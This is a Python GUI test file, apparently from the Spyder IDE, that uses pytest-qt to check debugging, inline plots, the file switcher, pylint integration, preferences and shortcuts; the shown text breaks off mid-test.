def test_stop_dbg(main_window, qtbot):
"""Test that we correctly stop a debugging session."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Move to the next line
shell.pdb_execute("!n")
qtbot.wait(1000)
# Stop debugging
stop_debug_action = main_window.debug_toolbar_actions[5]
stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Assert there are only two ipdb prompts in the console
assert shell._control.toPlainText().count('IPdb') == 2
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
"""
Test that using the Working directory toolbar is working while debugging.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set the temp directory as cwd
main_window.workingdirectory.chdir(tempfile.gettempdir())
qtbot.wait(1000)
print(repr(control.toPlainText()))
shell.clear_console()
qtbot.wait(500)
# Get cwd in console
qtbot.keyClicks(control, 'import os; os.getcwd()')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Assert cwd is the right one
assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
"""Test that %varexp is working while debugging."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Get to an object that can be plotted
for _ in range(2):
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Generate the plot from the Variable Explorer
nsb.editor.plot('li', 'plot')
qtbot.wait(1000)
# Assert that there's a plot in the console
assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
"""
Test that plots generated in the IPython console are properly displayed
in the plots plugin.
"""
assert CONF.get('plots', 'mute_inline_plotting') is False
shell = main_window.ipyconsole.get_current_shellwidget()
figbrowser = main_window.plots.current_widget()
# Wait until the window is fully up.
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate a plot inline.
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig = plt.plot([1, 2, 3, 4], '.')\n"))
if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
else:
assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'
# Get the image name from the html, fetch the image from the shell, and
# save it as a png.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
ipython_qimg = shell._get_image(img_name)
ipython_qimg.save(ipython_figname)
# Save the image with the Plots plugin as a png.
plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
return_value=(plots_figname, '.png'))
figbrowser.save_figure()
assert compare_images(ipython_figname, plots_figname, 0.1) is None
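# A minimal sketch of the image comparison used above: matplotlib's
# compare_images() returns None when the two PNG files differ by less than
# the given RMS tolerance, and a diagnostic string otherwise. The file paths
# here are placeholders.
def _images_match_sketch(expected_png, actual_png, tol=0.1):
    from matplotlib.testing.compare import compare_images

    return compare_images(expected_png, actual_png, tol) is None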
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
"""
Test that the option to set bbox_inches to 'tight' or 'None' is
working when plotting inline in the IPython console. By default, figures
are plotted inline with bbox_inches='tight'.
"""
tmpdir = to_text_string(tmpdir)
# Assert that the default is True.
assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
# Wait until the window is fully up.
shell = main_window.ipyconsole.get_current_shellwidget()
client = main_window.ipyconsole.get_current_client()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Generate a plot inline with bbox_inches=tight (since it is default) and
# save the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches='tight',\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# Change the option so that bbox_inches=None.
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
# Restart the kernel and wait until it's up again
shell._prompt_html = None
client.restart_kernel()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate the same plot inline with bbox_inches=None and save the
# figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches=None,\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
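# A minimal, self-contained sketch of the bbox_inches behaviour exercised
# above: the same figure saved with bbox_inches='tight' is cropped to its
# artists, while bbox_inches=None keeps the full canvas. Illustrative only;
# the test above drives this through the IPython console's inline backend.
def _bbox_inches_sketch(output_dir):
    import os.path as _osp
    import matplotlib.pyplot as plt

    fig, ax = plt.subplots(figsize=(6, 4))
    ax.plot(range(10))
    tight_png = _osp.join(output_dir, 'tight.png')
    full_png = _osp.join(output_dir, 'full.png')
    # bbox_inches='tight' crops the saved image to the drawn artists ...
    fig.savefig(tight_png, bbox_inches='tight', dpi=72)
    # ... while bbox_inches=None keeps the figure's full canvas size.
    fig.savefig(full_png, bbox_inches=None, dpi=72)
    plt.close(fig)
    return tight_png, full_png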
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
"""Test the use of shorten paths when necessary in the switcher."""
switcher = main_window.switcher
# Assert that the full path of a file is shown in the switcher
file_a = tmpdir.join('test_file_a.py')
file_a.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file_a))
main_window.open_switcher()
switcher_paths = [switcher.model.item(item_idx).get_description()
for item_idx in range(switcher.model.rowCount())]
assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
switcher.close()
# Assert that long paths are shortened in the switcher
dir_b = tmpdir
for _ in range(3):
dir_b = dir_b.mkdir(str(uuid.uuid4()))
file_b = dir_b.join('test_file_b.py')
file_b.write('bar\n')
main_window.editor.load(str(file_b))
main_window.open_switcher()
file_b_text = switcher.model.item(
switcher.model.rowCount() - 1).get_description()
assert '...' in file_b_text
switcher.close()
# Assert search works correctly
search_texts = ['test_file_a', 'file_b', 'foo_spam']
expected_paths = [file_a, file_b, None]
for search_text, expected_path in zip(search_texts, expected_paths):
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, search_text)
qtbot.wait(200)
assert switcher.count() == bool(expected_path)
switcher.close()
# Assert symbol switcher works
main_window.editor.set_current_filename(str(file_a))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(9000)
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, '@')
qtbot.wait(200)
assert switcher.count() == 2
switcher.close()
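# A hypothetical, simplified sketch of the path shortening asserted above
# (the '...' in long switcher descriptions). Spyder's switcher uses its own
# helper for this; this standalone version only illustrates the idea of
# truncating the middle of an over-long path.
def _shorten_path_sketch(path, max_length=75):
    if len(path) <= max_length:
        return path
    keep = (max_length - 3) // 2
    return path[:keep] + '...' + path[-keep:]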
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
"""
Test that the file switcher is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file_open_switcher_dlg.py')
file.write("a test file for test_edidorstack_open_switcher_dlg")
main_window.editor.load(str(file))
# Test that the file switcher opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_switcher_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert (editorstack.switcher_dlg.count() ==
len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
"""
Test that the symbol finder is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file.py')
file.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(5000)
# Test that the symbol finder opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_symbolfinder_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
"""This tests that the Pylint plugin is working as expected."""
from spyder.plugins.pylint.main_widget import PylintWidgetActions
# Select the third-party plugin
pylint_plugin = get_thirdparty_plugin(main_window, "Code Analysis")
# Do an analysis
test_file = osp.join(LOCATION, 'script_pylint.py')
main_window.editor.load(test_file)
pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
qtbot.wait(3000)
# Perform the test
# Check output of the analysis
treewidget = pylint_plugin.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: treewidget.results is not None,
timeout=SHELL_TIMEOUT)
result_content = treewidget.results
assert result_content['C:']
pylint_version = LooseVersion(pylint.__version__)
if pylint_version < LooseVersion('2.5.0'):
number_of_conventions = 5
else:
number_of_conventions = 3
assert len(result_content['C:']) == number_of_conventions
# Close the file
main_window.editor.close_file()
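# A minimal sketch of how the convention ("C") messages counted above could
# be obtained outside Spyder, by running pylint's CLI with JSON output
# (assumes Python 3 for subprocess.run). Illustrative only; the Code Analysis
# plugin goes through its own widget and parser instead.
def _count_pylint_conventions_sketch(filename):
    import json
    import subprocess
    import sys

    proc = subprocess.run(
        [sys.executable, '-m', 'pylint', '--output-format=json', filename],
        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
        universal_newlines=True)
    messages = json.loads(proc.stdout) if proc.stdout else []
    # pylint marks convention messages with type == 'convention' in its
    # JSON output.
    return sum(1 for msg in messages if msg.get('type') == 'convention')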
@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
"""Test that the troubleshooting menu item calls the valid URL."""
help_plugin = main_window.help
MockQDesktopServices = Mock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Unit test of help menu item: Make sure the correct URL is called.
help_plugin.trouble_action.trigger()
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
"""
Test fix for spyder-ide/spyder#6317.
'Show tutorial' opens the help plugin if closed.
"""
HELP_STR = "Help"
help_pane_menuitem = None
for action in main_window.plugins_menu.actions():
if action.text() == HELP_STR:
help_pane_menuitem = action
break
# Test opening the tutorial with the Help plugin closed
main_window.help.toggle_view_action.setChecked(False)
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert help_tabbar is None and help_index is None
assert not isinstance(main_window.focusWidget(), ObjectComboBox)
assert not help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open, but not selected
help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
% help_tabbar.count())
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index != help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open and the active tab
qtbot.wait(500)
main_window.help.show_tutorial()
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
qtbot.wait(500)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
"""Test that the report error dialog opens correctly."""
main_window.console.report_issue()
qtbot.wait(300)
assert main_window.console.get_widget()._report_dlg is not None
assert main_window.console.get_widget()._report_dlg.isVisible()
assert main_window.console.get_widget()._report_dlg.close()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
mw = main_window
mw.first_spyder_run = False
prefix = 'window' + '/'
settings = mw.load_window_settings(prefix=prefix, default=True)
# Test layout changes
for layout_idx in ['default'] + list(range(4)):
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
layout = mw.setup_default_layouts(layout_idx, settings=settings)
with qtbot.waitSignal(None, timeout=500, raising=False):
# Add a wait to see changes
pass
widgets_layout = layout['widgets']
hidden_widgets = layout['hidden widgets']
for column in widgets_layout:
for row in column:
for idx, widget in enumerate(row):
if idx == 0:
if widget not in hidden_widgets:
print(widget) # spyder: test-skip
try:
# New API
assert widget.get_widget().isVisible()
except AttributeError:
# Old API
assert widget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
# Load test file
test_file = osp.join(LOCATION, 'script.py')
test_file_copy = test_file[:-3] + '_copy.py'
shutil.copyfile(test_file, test_file_copy)
main_window.editor.load(test_file_copy)
code_editor = main_window.editor.get_focus_widget()
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
filename = code_editor.filename
with qtbot.waitSignal(shell.sig_prompt_ready):
shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
assert shell.get_value('test_var') == 123
main_window.editor.close_file()
os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
"""Test that file editor focus change updates pylint combobox filename."""
for plugin in main_window.thirdparty_plugins:
if plugin.CONF_SECTION == 'pylint':
pylint_plugin = plugin
break
# Show pylint plugin
pylint_plugin.dockwidget.show()
pylint_plugin.dockwidget.raise_()
# Create base temporary directory
basedir = tmpdir.mkdir('foo')
# Open some files
for idx in range(2):
fh = basedir.join('{}.py'.format(idx))
fname = str(fh)
fh.write('print("Hello world!")')
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Create an editor split
main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
qtbot.wait(500)
# Open other files
for idx in range(4):
fh = basedir.join('{}.py'.format(idx))
fh.write('print("Hello world!")')
fname = str(fh)
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Close split panel
for editorstack in reversed(main_window.editor.editorstacks):
editorstack.close_split()
break
qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_report_comms_error(qtbot, main_window):
"""Test if a comms error is correctly displayed."""
CONF.set('main', 'show_internal_errors', True)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a bogus get_cwd
with qtbot.waitSignal(shell.executed):
shell.execute('def get_cwd(): import foo')
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm."
"register_call_handler('get_cwd', get_cwd)")
with qtbot.waitSignal(shell.executed, timeout=3000):
shell.execute('ls')
error_dialog = main_window.console.error_dialog
assert error_dialog is not None
assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
assert 'No module named' in error_dialog.error_traceback
main_window.console.close_error_dialog()
CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
"""Test that we can set breakpoints while running."""
# Create loop
code = ("import time\n"
"for i in range(100):\n"
" print(i)\n"
" time.sleep(0.1)\n"
)
p = tmpdir.join("loop_script.py")
p.write(code)
test_file = to_text_string(p)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Load test file
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Continue debugging
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
# Set a breakpoint
code_editor.debugger.toogle_breakpoint(line_number=3)
# We should drop into the debugger
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, '!q')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
"""
Open preferences dialog and select page with `section` (CONF_SECTION).
"""
main_window.show_preferences()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg = main_window.prefs_dialog_instance
index = dlg.get_index_by_name(section)
page = dlg.get_page(index)
dlg.set_current_index(index)
return dlg, index, page
@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
"""
Test for spyder-ide/spyder#13524 regression.
Ensure the Run section exists.
"""
assert preferences_dialog_helper(qtbot, main_window, 'run')
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder#10139 regression.
Enabling codestyle/docstyle in the completions section of Preferences
was not updating them correctly.
"""
# Reset config
CONF.set('lsp-server', 'pycodestyle', False)
CONF.set('lsp-server', 'pydocstyle', False)
# Open completion preferences and update options
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'lsp-server')
# Get the correct tab pages inside the Completion preferences page
tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
tab_widgets = {
tnames.index('code style and formatting'): page.code_style_check,
tnames.index('docstring style'): page.docstring_style_check,
}
for idx, check in tab_widgets.items():
page.tabs.setCurrentIndex(idx)
check.animateClick()
qtbot.wait(500)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
# Check the menus are correctly updated
count = 0
for menu_item in main_window.source_menu_actions:
if menu_item and isinstance(menu_item, QAction):
print(menu_item.text(), menu_item.isChecked())
if 'code style' in menu_item.text():
assert menu_item.isChecked()
count += 1
elif 'docstring style' in menu_item.text():
assert menu_item.isChecked()
count += 1
assert count == 2
# Reset config
CONF.set('lsp-server', 'pycodestyle', False)
CONF.set('lsp-server', 'pydocstyle', False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder#10284 regression.
Changing the font resulted in an error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'appearance')
for fontbox in [page.plain_text_font.fontbox,
page.rich_text_font.fontbox]:
fontbox.setFocus()
idx = fontbox.currentIndex()
fontbox.setCurrentIndex(idx + 1)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.skipif(
not sys.platform.startswith('linux'),
reason="Changes of Shitf+Return shortcut cause an ambiguos shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder#12992 regression.
Overwriting shortcuts resulted in a shortcut conflict.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Setup shortcuts (set run cell and advance shortcut to run selection)
base_run_cell_advance = CONF.get_shortcut(
'editor', 'run cell and advance') # Should be Shift+Return
base_run_selection = CONF.get_shortcut(
'editor', 'run selection') # Should be F9
assert base_run_cell_advance == 'Shift+Return'
assert base_run_selection == 'F9'
CONF.set_shortcut(
'editor', 'run cell and advance', '')
CONF.set_shortcut(
'editor', 'run selection', base_run_cell_advance)
main_window.shortcuts.apply_shortcuts()
# Check execution of shortcut
# Create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(u'print(0)\nprint(ññ)')
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
assert u'ññ' not in shell._control.toPlainText()
# Reset shortcuts
CONF.set_shortcut(
'editor', 'run selection', 'F9')
CONF.set_shortcut(
'editor', 'run cell and advance', 'Shift+Return')
main_window.shortcuts.apply_shortcuts()
qtbot.wait(500) # Wait for shortcut change to actually be applied
# Check shortcut run cell and advance reset
code_editor.setFocus()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder#11132 regression.
Resetting a shortcut resulted in an error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'shortcuts')
page.reset_to_default(force=True)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
def test_preferences_change_interpreter(qtbot, main_window):
"""Test that on main interpreter change signal is emitted."""
# Check original pyls configuration
lsp = main_window.completions.get_client('lsp')
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] is None
assert jedi['extra_paths'] == []
# Change main interpreter on preferences
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
page.cus_exec_radio.setChecked(True)
page.cus_exec_combo.combobox.setCurrentText(sys.executable)
with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
timeout=5000, raising=True):
dlg.ok_btn.animateClick()
# Check updated pyls configuration
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] == sys.executable
assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
# Test that the last selected page is restored when reopening the dialog
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
main_window.show_preferences()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg = main_window.prefs_dialog_instance
assert dlg.get_current_index() == index
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
"""Test that go-to-definition works as expected."""
# --- Code that gives no definition
code_no_def = dedent("""
from qtpy.QtCore import Qt
Qt.FramelessWindowHint""")
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_no_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to
# FramelessWindowHint
code_editor.move_cursor(-1)
with qtbot.waitSignal(code_editor.lsp_response_signal):
code_editor.go_to_definition_from_cursor()
# Capture stderr and assert there are no errors
sys_stream = capsys.readouterr()
assert sys_stream.err == u''
# --- Code that gives definition
code_def = "import qtpy.QtCore"
